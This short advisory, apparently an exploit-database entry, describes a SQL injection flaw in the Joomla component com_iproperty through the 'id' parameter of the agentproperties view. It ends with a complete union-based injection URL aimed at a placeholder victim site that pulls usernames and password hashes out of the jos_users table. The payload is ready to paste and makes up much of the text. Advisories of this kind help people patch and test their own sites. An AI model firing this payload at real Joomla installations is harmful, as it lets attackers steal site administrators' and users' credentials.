Joomla Component com_iproperty SQL Injection Vulnerability
A SQL injection vulnerability exists in the Joomla Component com_iproperty. An attacker can exploit this vulnerability to gain access to sensitive information stored in the database. The vulnerable parameter is the 'id' parameter in the 'index.php?option=com_iproperty&view=agentproperties&id=[SQL]' URL. An attacker can inject malicious SQL code into the 'id' parameter to gain access to sensitive information stored in the database. An example of the exploit is 'http://www.victime.com/index.php?option=com_iproperty&view=agentproperties&id=-999999/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,group_concat(username,char(58),password)v3n0m/**/from/**/jos_users--'